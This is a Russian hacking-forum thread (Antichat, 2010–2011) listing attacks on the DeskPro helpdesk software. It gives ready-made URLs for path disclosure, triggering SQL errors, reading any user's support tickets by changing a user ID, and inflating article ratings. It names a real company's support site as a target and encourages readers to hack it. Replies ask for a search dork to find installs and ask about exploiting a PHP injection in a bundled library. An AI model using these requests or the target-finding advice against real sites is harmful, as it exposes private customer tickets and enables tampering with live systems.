ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Веб-уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=114)
-   -   [ Обзор уязвимостей DeskPro ] (https://forum.antichat.xyz/showthread.php?t=233714)

Isis 05.10.2010 14:33
Открытие локального пути

Код:
https://site.com/email/backup.php
Код:
https://site.com/email/checks.php
SQL Error & Открытие локального пути

Код:
https://site.com/feeds/rss_tickets.php?user=8&type=replyg
Просмотр петиций любого пользователя

Код:
https://site.com/feeds/rss_tickets.php?user=22&type=replyu
Увеличение рейтинга любой статьи на N

Код:
https://site.com/kb_rate.php?ref=TICKET_NUMBER&howhelpful=9999999
Пример: support.4game.ru, хекайте

HIMIKAT 05.10.2010 19:13
Дорк еще не помешал бы, для поиска этого двига.

Isis 05.10.2010 19:52
deskpro.com

google.com -> q -> deskpro

Soul Linker 17.09.2011 15:19
UP. Тема актуальна.. кто нибудь нашел как можно использовать php-inj в DeskPRO/includes/3rdparty/html2text/html2text.php ?


Время: 07:24